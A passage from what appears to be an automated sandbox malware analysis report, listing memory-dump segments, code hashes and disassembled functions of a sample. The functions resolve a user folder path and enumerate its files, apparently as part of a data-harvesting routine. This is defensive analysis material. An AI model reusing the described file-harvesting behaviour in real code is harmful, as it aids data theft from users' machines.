                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: dd9a5f26e514f1158d7bb8258088d4190c5543b1c26cfbccb7cdc3dc6615e3ff
                          • Instruction ID: 9075b19bca1c2e1648a47cb651a9ceb0be81e56fa4b7b0f54fc78a1d3ff9cfb6
                          • Opcode Fuzzy Hash: dd9a5f26e514f1158d7bb8258088d4190c5543b1c26cfbccb7cdc3dc6615e3ff
                          • Instruction Fuzzy Hash: E2F096329107129FE720BBB8581E7493FA0BF44717F14414FFC14A75D2DB6459489F56
                          Function 00554F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00558DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00554F7A
                          • lstrcat.KERNEL32(?,00561070), ref: 00554F97
                          • lstrcat.KERNEL32(?,01238C28), ref: 00554FAB
                          • lstrcat.KERNEL32(?,00561074), ref: 00554FBD
                            • Part of subcall function 00554910: wsprintfA.USER32 ref: 0055492C
                            • Part of subcall function 00554910: FindFirstFileA.KERNEL32(?,?), ref: 00554943
                            • Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,00560FDC), ref: 00554971
                            • Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,00560FE0), ref: 00554987
                            • Part of subcall function 00554910: FindNextFileA.KERNEL32(000000FF,?), ref: 00554B7D
                            • Part of subcall function 00554910: FindClose.KERNEL32(000000FF), ref: 00554B92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                          • String ID:
                          • API String ID: 2667927680-0
                          • Opcode ID: 35b5f1682a6adc56160cad7ce8b1d0b1cd8f8343cd55b50636e63bea7d97e88e
                          • Instruction ID: c764d443fec126576a83e8c0cf76ee99363e59a14047bbfa82e47d8c3e9b7282
                          • Opcode Fuzzy Hash: 35b5f1682a6adc56160cad7ce8b1d0b1cd8f8343cd55b50636e63bea7d97e88e
                          • Instruction Fuzzy Hash: 6821DA7694020977D754FBB0DC5AEEE373CBB94300F008546B65A93181EE789ACC8FA6